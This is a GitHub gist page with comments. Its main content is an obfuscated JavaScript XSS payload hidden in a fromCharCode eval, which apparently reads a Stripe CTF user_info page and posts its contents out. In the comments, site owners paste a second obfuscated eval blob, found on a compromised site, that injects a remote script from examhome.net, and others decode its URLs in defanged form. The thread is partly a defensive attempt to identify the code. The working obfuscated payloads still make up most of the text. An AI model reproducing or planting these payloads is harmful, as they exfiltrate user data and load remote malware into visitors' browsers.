Skip to content

Instantly share code, notes, and snippets.

@jonmarkgo

jonmarkgo/gist:3431818

Created August 23, 2012 03:18
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save jonmarkgo/3431818 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save jonmarkgo/3431818 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.js
</script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 10, 36, 46, 103, 101, 116, 40, 39, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 118, 101, 108, 48, 54, 45, 50, 46, 115, 116, 114, 105, 112, 101, 45, 99, 116, 102, 46, 99, 111, 109, 47, 117, 115, 101, 114, 45, 116, 104, 107, 122, 115, 97, 108, 119, 110, 113, 47, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 100, 97, 116, 97, 41, 32, 123, 10, 32, 32, 36, 40, 39, 35, 116, 105, 116, 108, 101, 39, 41, 46, 118, 97, 108, 40, 39, 112, 97, 115, 115, 39, 41, 59, 10, 32, 32, 100, 97, 116, 97, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 116, 100, 47, 103, 44, 32, 34, 120, 116, 100, 120, 34, 41, 59, 10, 32, 32, 36, 40, 39, 35, 99, 111, 110, 116, 101, 110, 116, 39, 41, 46, 118, 97, 108, 40, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 36, 40, 100, 97, 116, 97, 41, 46, 102, 105, 110, 100, 40, 34, 120, 116, 100, 120, 34, 41, 46, 116, 101, 120, 116, 40, 41, 41, 41, 59, 10, 32, 32, 36, 40, 39, 35, 110, 101, 119, 95, 112, 111, 115, 116, 39, 41, 46, 115, 117, 98, 109, 105, 116, 40, 41, 59, 10, 125, 41, 59, 10, 125, 41))</script><script>
@chainchopper

chainchopper commented Sep 19, 2018

Copy link
Copy Markdown

Found this string in a bit of malicious code on my site. pasted the entire thing in google and lead me right to this gist. Why?

@chainchopper

chainchopper commented Sep 19, 2018

Copy link
Copy Markdown

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 57, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));

@hscale

hscale commented Sep 23, 2018

Copy link
Copy Markdown

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 57, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));
Report him
https://github.com/contact/report-abuse?report=jonmarkgo+%28user%29

@ikaroony

ikaroony commented Apr 5, 2023

Copy link
Copy Markdown

Ran this through CyberChef, here's the defanged url:

hxxps[://]examhome[.]net/stat[.]js?v=1[.]0[.]1xamhome

I'm new to code analysis like this so idk if pasting the entire process of decoding this would be good, but here's the URL

@jonmarkgo

jonmarkgo commented Apr 5, 2023

Copy link
Copy Markdown
Author

fwiw I'm pretty sure I pasted this here in a gist (11 years ago?) because I also found it in code on my site too and wanted to get feedback on wtf it was from other people

@ikaroony

ikaroony commented Apr 5, 2023

Copy link
Copy Markdown

fwiw I'm pretty sure I pasted this here in a gist (11 years ago?) because I also found it in code on my site too and wanted to get feedback on wtf it was from other people

that makes sense bc idk why someone actually infecting stuff with malicious code would post it on a personal github lmao
i might keep messing around with it tryna find an ip but that url should be good.
though im definitely not the first to find this. i found this snippet on one of mattnotmax 's cyberchef repos

@ikaroony

ikaroony commented Apr 5, 2023
edited
Loading

Copy link
Copy Markdown

another url
@jonmarkgo does this look familiar to something actually on your website? or is it a different url
defanged for your convenience
hxxps[://]level06-2[.]stripe-ctf[.]com/user-thkzsalwnq/user_info
edit: stripe ctf?? whys is that here

@jonmarkgo

jonmarkgo commented Apr 5, 2023

Copy link
Copy Markdown
Author

I mean, the stripe CTF was an actual capture the flag challenge Stripe the company ran - no idea about that specific URL

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment